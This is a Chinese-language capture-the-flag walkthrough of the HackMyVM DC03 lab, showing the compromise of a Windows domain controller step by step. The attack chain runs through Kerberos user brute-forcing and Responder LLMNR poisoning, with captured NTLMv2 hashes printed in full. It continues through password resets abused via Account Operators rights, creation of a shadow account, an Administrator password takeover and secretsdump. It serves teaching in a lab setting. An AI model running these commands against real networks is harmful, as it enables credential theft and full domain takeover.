13.1 外网打点
nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'![图片[1]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025172417166.png?imageSlim)
卧槽什么都没有,这怎么打?
nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A![图片[2]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025172901379.png?imageSlim)
扫错了,哈哈哈哈,靶机重启,原来是我换wifi了
![图片[3]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025173348654.png?imageSlim)
再来
nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'![图片[4]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025173328229.png?imageSlim)
nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A![图片[5]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025182318817.png?imageSlim)
根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的,还有smb协议
enum4linux-ng -A 192.168.215.25 -C![图片[6]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025184712006.png?imageSlim)
13.2 尝试使用匿名登录
smb匿名连接
![图片[7]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025185231389.png?imageSlim)
13.3 kerberos 用户名枚举
kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25![图片[8]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025192627016.png?imageSlim)
![图片[9]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025192716649.png?imageSlim)
charlie
administrator
wreed11
webserver爆破smb
nxc smb 192.168.215.25 -u user -p user![图片[10]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025192853950.png?imageSlim)
13.4 爆破 kerberos 协议
kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11
kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败
![图片[11]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025195739242.png?imageSlim)
13.4 LLMNR 投毒攻击
13.4.1 具体流程
骗取目标设备的账号密码哈希,具体流程如下:
- 监听局域网内的 LLMNR 请求:用
Responder(你之前用过的工具)等软件,在攻击机上监听局域网内的 LLMNR 广播; - 伪造响应欺骗目标:当目标设备(比如域内的员工电脑)发起 LLMNR 请求(如解析
\\共享打印机名)时,攻击机抢先回复:“我就是你要找的设备,我的 IP 是攻击机 IP”; - 骗取哈希值:目标设备相信后,会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接(比如访问共享文件夹),攻击机就能捕获到这个哈希;
- 破解哈希或直接用哈希登录:拿到哈希后,可通过
hashcat破解成明文密码,或直接用 “哈希传递(PTH)” 登录其他设备。
13.4.2 如何用 LLMNR 拿到域内哈希
比如你在域渗透中,攻击机和目标域内的员工电脑在同一个网段(192.168.215.0/24):
- 在 Kali 上启动
Responder,开启 LLMNR 监听: - 员工在电脑上误输入
\\不存在的共享名(比如\\file-server),DNS 解析失败,触发 LLMNR 广播; Responder捕获到这个请求,伪装成file-server回复员工电脑;- 员工电脑用当前登录用户(比如
SOUPEDECODE\charlie)的 NTLM 哈希,尝试与攻击机建立 SMB 连接; Responder成功捕获到charlie的哈希,你后续就可以用这个哈希进行 PTH 攻击,登录其他域内设备。
responder -I eth0 -wd![图片[12]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025200406604.png?imageSlim)
这里应该是域控靶机的计划任务,所以能拿到hash
![图片[13]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025200445776.png?imageSlim)
拿到这个账号的hash,准备去爆破
![图片[14]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025200519260.png?imageSlim)
[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd
[SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000
---
[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000![图片[15]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025201534254.png?imageSlim)
13.5 smb渗透
找到账号密码,查看smb服务器内有什么东西
xkate578:jesuschrist
smbclient -L //192.168.215.25/ -U xkate578![图片[16]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025201757032.png?imageSlim)
登录到share共享文件夹,发现user.txt
![图片[17]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025201951227.png?imageSlim)
尝试上传,发现这个用户有上传文件的权限
![图片[18]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025202114822.png?imageSlim)
使用evil-winrm连接失败
evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist
![图片[19]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025202647277.png?imageSlim)
13.6 查询域内SPN关联用户
查询寻域内所有关联了SPN的用户(用于发现这些用户的TGS票据,从而破解密码)
![图片[20]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025202855070.png?imageSlim)
13.7 枚举域内用户SID
xkate578这个用户有查看域内SID信息的权限
python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt![图片[21]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025203304124.png?imageSlim)
把这些用户名信息导出为一个用户字典
grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt![图片[22]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025203522370.png?imageSlim)
13.8 爆破 kerberos
针对域用户 xkate578 进行 “密码暴力破解” 的操作,核心目的是通过字典攻击尝试获取该用户的明文密码。
ntpdate 192.168.215.25
kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v![图片[23]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025204105857.png?imageSlim)
13.9 nxc爆破smb
使用nxc内网渗透神器,使用相同的账号密码爆破smb服务器,全部失败
![图片[24]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025204052038.png?imageSlim)
13.10 获取不需要预认证用户的AS-REP哈希
全部没有
impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt![图片[25]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025204427190.png?imageSlim)
利用之前得到的密码 xkate578:jesuschrist
ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt![图片[26]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025212947912.png?imageSlim)
| 参数 | 作用 |
|---|---|
-x |
使用简单认证(非 SASL 认证),适合用用户名 / 密码登录。 |
-H ldap://192.168.215.25 |
指定 LDAP 服务器地址(这里是域控的 IP)。 |
-D "xkate578@SOUPEDECODE.LOCAL" |
绑定的用户 DN(用户名),即使用 xkate578 的凭证登录 LDAP。 |
-w 'jesuschrist' |
绑定用户的密码(xkate578 的密码)。 |
-b 'DC=SOUPEDECODE,DC=LOCAL' |
查询的基准 DN(域的根目录),即从整个域范围查询。 |
"sAMAccountName=xkate578" |
过滤条件:只查询 sAMAccountName 为 xkate578 的用户(精准定位自身)。 |
memberOf |
只返回该用户的 memberOf 字段(即所属的组)。 |
> ldap_result.txt |
将结果输出到文件,方便查看。 |
从结果中可以看到这个用户属于Account Operators 组
作用:
- 创建 / 修改 / 删除普通域用户账号可在域内新增用户(如
testuser)、修改现有用户的属性(如密码、登录脚本、所属组等),但不能修改域管理员(Domain Admins)等高级账号。 - 管理用户组(非特权组)可创建新的普通用户组,或修改普通组的成员(如将
zximena448加入某个组),但不能修改Domain Admins、Enterprise Admins等特权组。 - 重置普通用户密码可强制重置普通域用户的密码(无需知道原密码),例如将
zximena448的密码改为hacked123,进而控制该账号。 - 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限,可获取更多域内账号的属性(如密码过期时间、登录次数等)。
尝试利用net命令和这些凭证,向目标域添加一个用户,然后使用evil-winrm连接的时候,连接不上
net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25
evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'![图片[27]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025214638339.png?imageSlim)
将用户添加到远程管理组即可使用evil-winrm连接
net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25
evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'![图片[28]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025214927533.png?imageSlim)
那么尝试添加管理员组呢?很明显,之前已经说过了,Account Operators组的用户,可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain Admins、Enterprise Admins 等特权组。
![图片[29]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025215008927.png?imageSlim)
再看看管理员组有哪些用户,一个是Operators,一个是Administrator,两个用户属于超级管理员’
ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name![图片[30]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025215554221.png?imageSlim)
从 LDAP 查询结果中,有几个关键线索表明 Operators 是自定义组而非 Windows 内置组:
Windows 内置操作员组都有特定的前缀:
Backup OperatorsPrint OperatorsServer OperatorsAccount Operators
而这里发现:
- 组名:
Operators(没有前缀) - 这不符合 Windows 内置组的命名规范
sAMAccountName 分析
ldif
# Operators, Users, SOUPEDECODE.LOCAL
dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL
name: Operators
sAMAccountName: Operators关键点:
sAMAccountName: Operators(没有数字后缀)- Windows 内置组通常有特定的 sAMAccountName 格式
- 例如内置的
Account Operators的 sAMAccountName 是Account Operators
另外
# 内置组通常在 Builtin 容器中
dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户
ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name![图片[31]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251025223326512.png?imageSlim)
# Account Operators 不能重置这些直接组成员的密码:
- 直接属于 Administrators 的用户
- 直接属于 Domain Admins 的用户
# 但可以重置这些用户的密码:
- 通过组嵌套获得管理员权限的用户
- 属于自定义管理组的用户再不清楚,就是这个链路
Domain Admins (域管理员组)
↑ 包含
Operators (自定义管理组)
↑ 包含
fbeth103 (普通用户)
xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码(回家重装了靶机,ip变了)
net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102
# 或者
[root@kali] /home/kali/DC03
❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎
rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!"
rpcclient $>
# 然后连接
evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'![图片[32]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026121138083.png?imageSlim)
此时就已经得到了最后的root.txt内容
![图片[33]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026121237625.png?imageSlim)
它这个自定义既然组隶属于管理员组,那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢?现在试试
┌──(root㉿kali)-[~]
└─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102
┌──(root㉿kali)-[~]
└─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator
![图片[34]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026121610414.png?imageSlim)
成功修改!都不需要去PTH(哈希传递攻击)了
13.11 PTH攻击(hash传递)
Secretdump
获取域内hash
impacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.102![图片[35]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026133454633.png?imageSlim)
![图片[36]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026133405385.png?imageSlim)
13.12 工具推荐 ldapdomaindump
除了ldapsearch工具之外,还有一个工具也可以看域内组织情况,叫做ldapdomaindump
ldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102![图片[37]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026134136619.png?imageSlim)
在生成的domain_groups.html中也能看到Operators属于Domain Admins组
![图片[38]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026134121144.png?imageSlim)
从这里也能看到fbeth103属于Operators组
![图片[39]-HackMyVm-DC03 :中等-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251026134652030.png?imageSlim)
用这个工具更为方便
13.13 DC03 域渗透总结
本次 DC03 域渗透从外网打点开始,先通过 nmap 扫描确定目标为域控制器,开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后,用 kerbrute 枚举到 charlie、administrator 等用户,爆破无果后通过 Responder 进行 LLMNR 投毒,捕获到 xkate578 的 NTLM 哈希并破解出密码。
利用 xkate578(属 Account Operators 组)的账号管理权限,先创建影子账号并加入远程管理组,成功登录后枚举域内用户,发现自定义组 Operators 隶属于 Domain Admins,且包含用户 fbeth103。
重置 fbeth103 密码并登录,利用其间接域管理员权限,成功修改 Administrator 密码,获取域控最高权限,最终找到 root.txt,全程未依赖复杂漏洞,主要通过权限嵌套与凭据复用推进。
往期推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 – 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容